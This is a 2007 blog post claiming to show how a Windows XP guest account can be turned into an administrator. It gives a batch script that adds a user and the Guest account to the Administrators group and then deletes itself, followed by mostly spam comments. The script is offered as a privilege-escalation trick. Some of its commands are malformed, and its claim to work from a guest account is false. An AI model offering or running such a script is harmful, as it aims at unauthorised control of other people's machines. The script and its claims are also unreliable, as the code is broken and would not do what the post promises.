How to convert Guest into Admin in windows XP

December 25th, 2007 Posted in the category How To's, Windows XP
ADVERTISEMENTS


When you log into guest account in Windows Xp you cannot access some functions which are available for admin account. Although this point is known to everyone the reason why I am telling it here is because there is a way to convert this guest account into admin account. Isn’t this cool?

So, In order to make this change you have to type the below given code in NOTEPAD and save the file as “Guest2admin.bat”
then u can double click the file to execute or run in the cmd.
it works for sure:

Here is the code:

echo off
title Please wait…
cls

net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add

del %0


Note : While doing this make sure that you have Guest profile on or else this won’t work.


Technorati : , , , , ,




If you liked this article you can Subscribe to my RSS Feed or Subscribe by Email

Related Posts :




No Responses to “How to convert Guest into Admin in windows XP”

  1. john Says:

    Nice site… Cool guestbook…+



  2. Timmy Says:

    Thanks so very much for taking your time to create this very useful and informative site. I have learned a lot from your site. Thanks!!0



  3. Martin Says:

    This website is Great! I will recommend you to all my friends. I found so much useful things here. Thank you.



  4. jeroen Says:

    You guys do a wonderful job! Keep up the good work!!!U



  5. Willem Says:

    Cool!.. Nice work…r



  6. Nishkarsh Says:

    WE cannot do this from guest account!



Leave a Reply

XHTML: You can use these tags: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>

PC's Place |Subscribe to RSS Feed|Design by Blog Oh! Blog